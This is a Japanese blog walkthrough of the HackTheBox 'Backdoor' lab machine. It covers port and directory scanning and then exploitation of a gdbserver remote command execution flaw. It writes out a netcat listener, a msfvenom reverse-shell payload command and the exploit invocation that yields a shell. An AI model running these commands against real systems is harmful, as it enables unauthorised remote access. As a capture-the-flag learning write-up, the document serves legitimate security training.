【HackTheBox】Backdoor - Walkthrough

セキュリティについて学び,ついでにHack the boxを取り組んだ.

現在Active machine なのに,YouTubeに解説動画が挙がっている.(1月13日)
とりあえず,私もBackdoorのWalkthroughを書いておこうと思った.
これも参考にしたらいいよ!

www.youtube.com


ここからは,ネタバレ注意!

Step. 1 nmap scan

最初にマシーンをリセットをすること!

指定されたIPアドレスをnmapスキャンするとSSHとhttpポートが開いていることが確認できる.

$ nmap -p- 10.10.11.125 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-13 22:25 JST
Nmap scan report for 10.10.11.125
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 1162.83 seconds


ポートが確認できたので,
http://10.10.11.125/login/php で検索すると,HPが表示される


f:id:Koo-Loo-Lee:20220202234221p:plain


http://10.129.188.167/wp-plugins/ に進む
f:id:Koo-Loo-Lee:20220202234334p:plain
__________________________________________________________________


http://10.129.188.167/wp-plugins/ebook-download に進む
f:id:Koo-Loo-Lee:20220202234555p:plain


readme.txtが怪しいので確認.

f:id:Koo-Loo-Lee:20220202234701p:plain
はずれ!
gobuster でディレトリスキャンをしてみたり,
 $gobuster dir -u http://10.10.11.125 -w/usr/share/dirb/wordlists.common.txt 
f:id:Koo-Loo-Lee:20220202235539p:plain
$ wp scan --url http://10.10.11.125 --enumerate u 
80 番ポートは word pressが使われているので, IDとPWをadmin など色々変えてログインしようとしても,できない...

Step. 2 飢弱性の発見.

実は,gobusterを使うとgdbサーバーで動いていることが確認できる. f:id:Koo-Loo-Lee:20220203000453p:plain 下のような,エクスプロイトを使って攻撃する. 動画では別の物を使っていた. www.exploit-db.com
f:id:Koo-Loo-Lee:20220203000637p:plain
画面右上のAuthorからダウンロードすればいい

Step. 3 攻撃

スクリプトをダウンロードしたら,nc コマンドを利用して 4444 ポートで待ち受けポートを起動する.
 $nc -lvnp 4444 
遠隔からサーバー上の任意のコマンド実行が可能! ということは外部からサーバーへ侵入できることを意味します. 自身の端末で待ち受けポートを起動できたら、先ほどの Shell.bin を利用. 外部の宛先(自身の端末宛)に対してへリバースシェル用のペイロードを msfvenom コマンドで作成する.
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=xxxxxxx LPORT=4444 
PrependFork=true -o shell.bin
<|
xxxxは自信のipアドレスを入れる.
心配なら,"ifconfig" コマンドで自分の ip アドレスを確認しておいた方がいい.


つぎに,権限を奪う.Python3 であることに注意する.
>| 
$ python3 50539.py 10.10.11.125:1337 shell.bin
4444 ポートに戻って確かめてみると,きちんとユーザーになっている. あとは,user.txt とroot.txt を cat コマンドをとる. 手に入れた root.txt を HP に戻って入力し,無事に Flag を立てることができると思う.

参考

[1] Hack The Box 日本語 Walkthrough/Writeup まとめ - Security Index (hatenablog.com) https://security-index.hatenablog.com/entry/2020/08/30/163229?amp=1#Lame
[2] Backdoor HTB WP/Linux Enumeration https://www.youtube.com/watch?v=eAuUIT3I2II
[3] GNU gdbserver 9.2 - Remote Command Execution (RCE) https://www.exploit-db.com/exploits/50539